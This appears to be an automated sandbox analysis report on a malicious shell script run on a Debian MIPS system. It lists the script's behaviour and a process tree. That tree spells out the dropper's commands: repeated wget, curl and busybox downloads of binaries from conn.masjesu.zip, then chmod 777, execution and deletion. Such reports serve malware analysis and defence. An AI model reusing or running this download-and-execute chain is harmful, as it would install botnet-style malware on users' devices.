Analysis Overview
SHA256
5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e
Threat Level: Shows suspicious behavior
The file 5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 01:50
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 01:50
Reported
2024-10-18 01:52
Platform
debian9-mipsbe-20240729-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | N/A |
| N/A | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | N/A |
| N/A | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | N/A |
| N/A | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | N/A |
| N/A | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | N/A |
| N/A | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | N/A |
| N/A | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | N/A |
| N/A | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | N/A |
| N/A | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | N/A |
| N/A | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | N/A |
| N/A | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | N/A |
| N/A | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | N/A |
| N/A | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | N/A |
| N/A | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | N/A |
| N/A | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | N/A |
| N/A | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | N/A |
| N/A | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | N/A |
| N/A | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | N/A |
| N/A | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | N/A |
| N/A | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | N/A |
| N/A | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | N/A |
| N/A | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | N/A |
| N/A | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | N/A |
| N/A | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | N/A |
| N/A | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | N/A |
| N/A | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | N/A |
| N/A | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ | /usr/bin/curl | N/A |
Processes
/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh
[/tmp/5e22ae6bfbeda215cebf16b8347348a22241025c21c08a8460ee7a60e044c94e.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/chmod
[chmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E
[./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/bin/rm
[rm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/chmod
[chmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT
[./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/bin/rm
[rm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/chmod
[chmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz
[./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/bin/rm
[rm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/chmod
[chmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319
[./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/bin/rm
[rm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/chmod
[chmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe
[./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/bin/rm
[rm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/chmod
[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/rm
[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/chmod
[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/rm
[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/chmod
[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/rm
[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/chmod
[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/rm
[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/chmod
[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/rm
[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/chmod
[chmod 777 hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/tmp/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ
[./hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/rm
[rm hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/chmod
[chmod 777 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/tmp/3wDzYpBDBabysp43dimFTylVEdU479lZE3
[./3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/bin/rm
[rm 3wDzYpBDBabysp43dimFTylVEdU479lZE3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/chmod
[chmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0
[./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/bin/rm
[rm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/chmod
[chmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6
[./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/bin/rm
[rm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/chmod
[chmod 777 X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/tmp/X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq
[./X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/bin/rm
[rm X7PmVin0HbByEGkw8LaaTJQXG9Rv9fUVxq]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/chmod
[chmod 777 rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/tmp/rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94
[./rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/bin/rm
[rm rGTehcLKVpg2vtJK516OMVl8rBYl3wPx94]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/chmod
[chmod 777 vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/tmp/vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu
[./vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/bin/rm
[rm vAfTotBD9hqtluhP8q43NZpDKMhfk6kutu]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/chmod
[chmod 777 t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/tmp/t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g
[./t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/bin/rm
[rm t5KexJnmiFLTPBMIiggZeJ3BLN4pbpz49g]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/chmod
[chmod 777 sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/tmp/sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12
[./sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/bin/rm
[rm sP9UMuKBtmLPxR2dgQy0JTYucgBsW2Ug12]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hefFw5BmXZ7JTaTOTFtjTvuiUUsyrOagTQ]
/bin/chmod
